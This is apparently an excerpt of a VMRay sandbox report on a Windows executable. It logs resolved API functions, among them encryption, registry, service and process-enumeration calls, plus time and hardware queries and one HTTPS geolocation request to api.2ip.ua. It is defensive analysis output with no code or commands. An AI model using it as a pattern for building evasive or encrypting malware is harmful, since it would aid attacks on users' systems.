Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x75364950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalFree, address_out = 0x75365558 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersion, address_out = 0x75364467 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x753611f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x753634d5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryA, address_out = 0x7538d526 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreW, address_out = 0x7537ca5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x753634b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x7536110c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x75363587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x753614fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x753611e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x753649ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x75361916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x753687c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x7538772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x753651cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x753651e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x75361725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x7536465a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x753658a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x75361946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x75364d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77603002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesW, address_out = 0x753e425f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x7536495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatW, address_out = 0x753834d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatW, address_out = 0x7537f481 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringW, address_out = 0x75363bca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x753617b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x75407bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x75361328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x753634c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77611f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x7538d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x753e454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableA, address_out = 0x7536e331 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x753614c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x775fe026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x775f22b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x775f2270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x753651b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x75363531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x75364a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x75387aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x7538d1d4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleCtrlHandler, address_out = 0x75368a09 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FatalAppExitA, address_out = 0x753e4691 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x776045f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = AreFileApisANSI, address_out = 0x753e40d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x753614e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x75361450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThread, address_out = 0x753617ec True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x75365189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x7538d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75364a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x75364493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x753654ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x7536dd0e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x7536179c True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x75488a29 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x75491341 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x75489a55 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x754878e2 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostQuitMessage, address_out = 0x75489abb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x754888f7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x75491361 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x75487809 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x7548b17d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x75490dfb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = IsWindow, address_out = 0x75487136 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x75489679 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x75493559 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x776025dd True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x754dfd1e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PeekMessageW, address_out = 0x754905ba True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostThreadMessageW, address_out = 0x75488bff True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxW, address_out = 0x754dfd3f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x7548787b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetHashParam, address_out = 0x76f5df7e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CloseServiceHandle, address_out = 0x76f6369c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x76f5df14 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x76f6157a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptHashData, address_out = 0x76f5df36 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x76f614d6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x76f6469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyHash, address_out = 0x76f5df66 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ControlService, address_out = 0x76f77144 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x76f6468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenServiceW, address_out = 0x76f5ca4c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x76f5e124 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptCreateHash, address_out = 0x76f5df4e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x76f7779b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x76f5c532 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = QueryServiceStatus, address_out = 0x76f62a86 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x76f646ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenSCManagerW, address_out = 0x76f5ca64 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderLocation, address_out = 0x75ebe141 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75e49ee8 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75e51e46 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteA, address_out = 0x76077078 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListW, address_out = 0x75ec17bf True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x75beb636 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitializeSecurity, address_out = 0x75bf7259 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoUninitialize, address_out = 0x75c186d3 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x75c19d0b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 9, address_out = 0x76b53eae True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 8, address_out = 0x76b53ed5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 12, address_out = 0x76b55dee True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 201, address_out = 0x76b54af8 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 6, address_out = 0x76b53e59 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 200, address_out = 0x76b53f21 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 2, address_out = 0x76b54642 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 202, address_out = 0x76b5fd6b True 1
Fn
Get Address c:\windows\syswow64\iphlpapi.dll function = GetAdaptersInfo, address_out = 0x750f9263 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 11, address_out = 0x76b1311b True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x76b27673 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 12, address_out = 0x76b1b131 True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsFree, address_out = 0x7502436b True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsQuery_W, address_out = 0x7503572c True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x751d5d77 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x74e9c544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x75364d28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x753e410b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x753e4195 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x7536d31f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x7537ee7e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7761441c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7763c50e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7763c381 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x7537f088 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x776205d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7763ca24 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x775f0b8c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x776afde8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x77641e1d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x753e4761 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x753dcd11 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x753e424f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x753e46b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x753f6676 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x753e4751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x753f65f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x753e47c1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x753e47e1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x753e47f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x7537eee0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcesses, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcessModules, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcesses, address_out = 0x75461544 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcessModules, address_out = 0x75461408 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = GetModuleBaseNameW, address_out = 0x7546152c True 1
Fn
System (274)
»
Operation Additional Information Success Count Logfile
Sleep duration = 1 milliseconds (0.001 seconds) True 19
Fn
Get Time type = System Time, time = 2019-03-24 05:39:10 (UTC) True 1
Fn
Get Time type = Ticks, time = 106533 True 1
Fn
Get Time type = Performance Ctr, time = 15370031874 True 1
Fn
Get Time type = System Time, time = 2019-03-24 05:39:12 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 15773662834 True 1
Fn
Get Info type = Hardware Information True 249
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Network Behavior
HTTP Sessions (1)
»
Information Value
Total Data Sent 467 bytes
Total Data Received 7.32 KB
Contacted Host Count 1
Contacted Hosts 77.123.139.189
HTTP Session #1
»
Information Value
Server Name api.2ip.ua
Server Port 443
Username -
Password -
Data Sent 467 bytes
Data Received 7.32 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Fn
Read Response size = 10240, size_out = 554 True 1
Fn
Data
Close Session - True 1
Fn
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image